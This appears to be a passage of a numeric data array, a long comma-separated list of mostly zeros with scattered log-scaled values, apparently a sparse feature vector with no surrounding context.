0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 5.2237778411112, 0.0, 5.76977456331519, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.8991863767100545, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.044522437723423, 0, 0, 3.3322045101752034, 2.772588722239781, 0.0, \n 0.0, 0.0, 0.0, 5.723585101952381, 2.772588722239781, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.7369991058576035, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, \n 2.6390573296152584, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.770684624465665, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.6094379124341003, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0,\n 0.0, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 10.163621819966615, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 10.203592144986466, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.26326207653313, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 4.160336650881089, 0.0, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.833213344056216, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.4011973816621555, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 4.828313737302301, 0.0, 0.0, 3.1354942159291497, 0.0, \n 0.0, 7.97305546761269, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0, \n 4.748123315783209, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.532599493153256, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.825453896395787, 0, 0.0, 0.0, 0.0,\n 0.0, 4.394449154672439, 3.800574088041945, 0.0, 0.0, 0.0, \n 1.3862943611198906, 1.791759469228055, 0.0, 0, 0.0, 3.044522437723423, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.6375861597263857, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616,\n 0.0, 0.0, 0.0, 0.0, 0.0, 6.976014914136014, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 6.238324625039507, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 